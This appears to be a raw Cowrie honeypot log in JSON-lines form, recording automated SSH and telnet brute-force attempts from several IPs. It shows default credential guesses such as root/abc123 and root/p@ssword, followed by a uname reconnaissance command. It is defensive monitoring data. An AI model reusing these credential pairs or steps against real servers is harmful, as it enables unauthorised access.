{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.545543Z","src_ip":"212.227.125.160","session":"0db1c867b47e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.771178Z","src_ip":"212.227.125.160","session":"0db1c867b47e"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.829945Z","src_ip":"164.92.210.70","session":"0724c1c69b9d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:58.831474Z","src_ip":"164.92.210.70","session":"0724c1c69b9d"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:23:59.426234Z","src_ip":"212.227.125.160","session":"0db1c867b47e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:23:59.975286Z","src_ip":"212.227.125.160","session":"0db1c867b47e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:23:59.975976Z","src_ip":"212.227.125.160","session":"0db1c867b47e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:00.196041Z","src_ip":"212.227.125.160","session":"0db1c867b47e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:00.197525Z","src_ip":"212.227.125.160","session":"0db1c867b47e"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":48638,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d06fc5b7f44","protocol":"telnet","message":"New connection: 8.222.212.69:48638 (1.2.3.4:23) [session: 5d06fc5b7f44]","sensor":"my-vps","timestamp":"2025-08-28T06:24:00.272890Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47144,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ae4b9aa54f0","protocol":"ssh","message":"New connection: 212.227.235.229:47144 (1.2.3.4:22) [session: 8ae4b9aa54f0]","sensor":"my-vps","timestamp":"2025-08-28T06:24:05.163101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:24:05.164042Z","src_ip":"212.227.235.229","session":"8ae4b9aa54f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:24:05.411010Z","src_ip":"212.227.235.229","session":"8ae4b9aa54f0"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:24:06.154796Z","src_ip":"212.227.235.229","session":"8ae4b9aa54f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:24:06.675580Z","src_ip":"212.227.235.229","session":"8ae4b9aa54f0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:24:06.676425Z","src_ip":"212.227.235.229","session":"8ae4b9aa54f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:06.925889Z","src_ip":"212.227.235.229","session":"8ae4b9aa54f0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:06.926972Z","src_ip":"212.227.235.229","session":"8ae4b9aa54f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34220,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e757cecf737","protocol":"ssh","message":"New connection: 212.227.125.160:34220 (1.2.3.4:22) [session: 3e757cecf737]","sensor":"my-vps","timestamp":"2025-08-28T06:24:15.269980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:24:15.271009Z","src_ip":"212.227.125.160","session":"3e757cecf737"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:24:15.500060Z","src_ip":"212.227.125.160","session":"3e757cecf737"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:24:16.192544Z","src_ip":"212.227.125.160","session":"3e757cecf737"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:17.425264Z","src_ip":"212.227.125.160","session":"3e757cecf737"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55092,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0829dc6a60","protocol":"ssh","message":"New connection: 212.227.235.229:55092 (1.2.3.4:22) [session: 4c0829dc6a60]","sensor":"my-vps","timestamp":"2025-08-28T06:24:21.810408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:24:21.811550Z","src_ip":"212.227.235.229","session":"4c0829dc6a60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:24:22.060878Z","src_ip":"212.227.235.229","session":"4c0829dc6a60"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:24:22.810524Z","src_ip":"212.227.235.229","session":"4c0829dc6a60"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:24.062811Z","src_ip":"212.227.235.229","session":"4c0829dc6a60"}
{"eventid":"cowrie.session.closed","duration":31.10771942138672,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:31.380519Z","src_ip":"8.222.212.69","session":"5d06fc5b7f44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52884,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b0fbe41de98","protocol":"ssh","message":"New connection: 212.227.125.160:52884 (1.2.3.4:22) [session: 9b0fbe41de98]","sensor":"my-vps","timestamp":"2025-08-28T06:24:31.638362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:24:31.639175Z","src_ip":"212.227.125.160","session":"9b0fbe41de98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:24:31.856545Z","src_ip":"212.227.125.160","session":"9b0fbe41de98"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:24:32.505173Z","src_ip":"212.227.125.160","session":"9b0fbe41de98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:24:33.061295Z","src_ip":"212.227.125.160","session":"9b0fbe41de98"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:24:33.062082Z","src_ip":"212.227.125.160","session":"9b0fbe41de98"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:33.279530Z","src_ip":"212.227.125.160","session":"9b0fbe41de98"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:33.280828Z","src_ip":"212.227.125.160","session":"9b0fbe41de98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55408,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8cef3e8f9fa","protocol":"ssh","message":"New connection: 212.227.235.229:55408 (1.2.3.4:22) [session: f8cef3e8f9fa]","sensor":"my-vps","timestamp":"2025-08-28T06:24:38.183319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:24:38.184131Z","src_ip":"212.227.235.229","session":"f8cef3e8f9fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:24:38.430545Z","src_ip":"212.227.235.229","session":"f8cef3e8f9fa"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:24:39.171809Z","src_ip":"212.227.235.229","session":"f8cef3e8f9fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:24:39.744044Z","src_ip":"212.227.235.229","session":"f8cef3e8f9fa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:24:39.744807Z","src_ip":"212.227.235.229","session":"f8cef3e8f9fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:39.992362Z","src_ip":"212.227.235.229","session":"f8cef3e8f9fa"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:39.993813Z","src_ip":"212.227.235.229","session":"f8cef3e8f9fa"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":40278,"dst_ip":"1.2.3.4","dst_port":23,"session":"f43c34fd4f3f","protocol":"telnet","message":"New connection: 8.222.212.69:40278 (1.2.3.4:23) [session: f43c34fd4f3f]","sensor":"my-vps","timestamp":"2025-08-28T06:24:46.200038Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59774,"dst_ip":"1.2.3.4","dst_port":22,"session":"641c2bbaf5ef","protocol":"ssh","message":"New connection: 212.227.125.160:59774 (1.2.3.4:22) [session: 641c2bbaf5ef]","sensor":"my-vps","timestamp":"2025-08-28T06:24:48.214487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:24:48.225200Z","src_ip":"212.227.125.160","session":"641c2bbaf5ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:24:48.433351Z","src_ip":"212.227.125.160","session":"641c2bbaf5ef"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:24:49.308326Z","src_ip":"212.227.125.160","session":"641c2bbaf5ef"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:50.528506Z","src_ip":"212.227.125.160","session":"641c2bbaf5ef"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":44796,"dst_ip":"1.2.3.4","dst_port":23,"session":"c97bbfb04fd6","protocol":"telnet","message":"New connection: 3.132.23.201:44796 (1.2.3.4:23) [session: c97bbfb04fd6]","sensor":"my-vps","timestamp":"2025-08-28T06:24:51.041533Z"}
{"eventid":"cowrie.session.closed","duration":0.0011458396911621094,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:24:51.042601Z","src_ip":"3.132.23.201","session":"c97bbfb04fd6"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":44804,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b3b4b012136","protocol":"telnet","message":"New connection: 3.132.23.201:44804 (1.2.3.4:23) [session: 2b3b4b012136]","sensor":"my-vps","timestamp":"2025-08-28T06:24:52.137203Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51230,"dst_ip":"1.2.3.4","dst_port":22,"session":"0650907e3d8e","protocol":"ssh","message":"New connection: 212.227.235.229:51230 (1.2.3.4:22) [session: 0650907e3d8e]","sensor":"my-vps","timestamp":"2025-08-28T06:24:54.719488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:24:54.720125Z","src_ip":"212.227.235.229","session":"0650907e3d8e"}
